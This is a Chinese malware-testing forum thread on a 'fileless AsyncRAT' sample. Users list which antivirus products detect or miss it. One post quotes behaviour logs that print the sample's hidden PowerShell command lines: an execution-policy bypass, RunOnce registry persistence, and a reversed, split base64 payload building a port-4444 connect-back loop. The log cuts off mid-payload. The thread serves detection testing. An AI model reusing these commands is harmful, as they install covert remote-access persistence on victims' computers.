无文件AsyncRAT

Loyisa

飞翔的蒲公英 发表于 2025-6-18 11:11
解压码是什么？输入infected显示密码错误

1. ps:virus

复制代码

多看看

飞翔的蒲公英

安天智甲：Trojan/VBA.GenScript

奇安信天守：Trojan.Boxter.0a4

Renascence

SESC静态扫描miss，运行后被自适应防护拦截，威胁名称ACM.Ps-Reg!g1

图钉鱼

Renascence 发表于 2025-6-18 12:16
SESC静态扫描miss，运行后被自适应防护拦截，威胁名称ACM.Ps-Reg!g1

SESC对安全的颗粒度比SEP高的多的多,EDR级别的主防

吃瓜群众第123位

360 kill

UNknownOoo

火绒
运行

1. 防护项目：利用PowerShell执行可疑脚本
   
2. 执行文件：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
   
3. 执行命令行：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\User\Desktop\downloaded.ps1'"
   
4. 操作结果：已允许
   

复制代码

1. 防护项目：隐藏执行PowerShell
   
2. 执行文件：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
   
3. 执行命令行：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c " = 'conhost.exe --headless powershell -nop -w hidden -c '+[char]34+System.Management.Automation.InvocationInfo.MyCommand+[char]34; Set-ItemProperty 'HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce' 'windows' 'conhost.exe --headless powershell -nop -w hidden -c cmd /c (Get-ItemProperty -Path ''HKCU:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows'').win'; Set-ItemProperty 'HKCU:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows' 'win' ;='ask='+'=g'+'ClRmL'+'0V2b'+'tFm'+'blk=';=.Substring(3,16).ToCharArray();[array]::reverse();=[System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String( -join ''));='}}};)00003(peelS.daerhT}{ hctac } ;)k(b { yrt{ )eurt( elihw{ )k gnirts(am diov citats cilbup}};)d(a};nruter;)(h.c{ )llun == d( fi;)(k.c = d ][etyb{ )eurt( elihw;)4444 ,k(A wen = c{ )k gnirts(b diov citats cilbup}};kaerb ;)(z :051 esac;kaerb ;)c(y :002 esac;kaerb ;)c(x :001 esac;kaerb;)c(v :05 esac{ )]0[b( hct
   
4. 操作结果：已允许
   

复制代码

cxllxc

WD miss

biue

腾讯电脑管家 1X

ongarabazanade